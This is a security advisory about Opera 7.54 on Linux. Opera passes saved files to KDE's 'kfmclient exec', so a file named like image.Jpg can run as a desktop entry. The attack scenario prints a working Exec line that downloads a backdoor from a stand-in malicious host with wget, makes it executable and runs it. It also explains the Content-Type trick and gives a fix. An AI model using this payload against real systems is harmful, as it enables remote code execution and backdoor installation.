Author: Giovanni Delvecchio e-mail: badpenguin@xxxxxxxxxx
Original Advisory:
Tested version: Opera 7.54 linux version with Kde 3.2.3
Opera for linux uses "kfmclient exec" as "Default Application" to handle
saved files.
This could be used by malicious remote users to execute arbitrary shell
commands on a target system.
Indeed, the command "kfmclient exec" could be used to open a "Kde Desktop Entry" and therefore execute the command within the "Exec=" entry.
Example of [KDE Desktop Entry]:
# KDE Config File [KDE Desktop Entry] SwallowExec= SwallowTitle= BinaryPattern= MimeType= Exec="Any arbitrary command" Icon= TerminalOptions= Path= Type=Application Terminal=0 ______________________________
Possible method of Exploitation =========================
This method of exploitation needs that a particular file name extension
is used.
If page.Htm is used as file name and "kfmclient exec page.Htm" is opened , the command in "Exec=" entry will be executed.
Instead, If "page.htm" is used as file name, it will not be opened like a "kde desktop entry" but it will be viewed in konqueror.
It works also with Jpg,Gif etc.. , but not with jpg,gif..extension, since
the "system" is case sensitive.
Attack scenario:
1- A user clicks on a link which requires http://malicious_server/image.Jpg
2- malicious_server responds with an unknown Content-Type field , for
example Content-Type: image/Jpeg. (note the dot at the end), so Opera will show a dialog window.
3- if a user chooses "Open" to view image.Jpg, it will be opened by "kfmclient exec" command, since kfmclient is the "Default Application"
4- Image.Jpg is a kde desktop entry :
# KDE Config File
[KDE Desktop Entry]
Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
---- end of image.Jpg-------
Note: \t is an horizontal tab.
In this case a backdoor will be downloaded on victim's computer and executed.
Solution: ======== Disable "kfmclient exec" as default application
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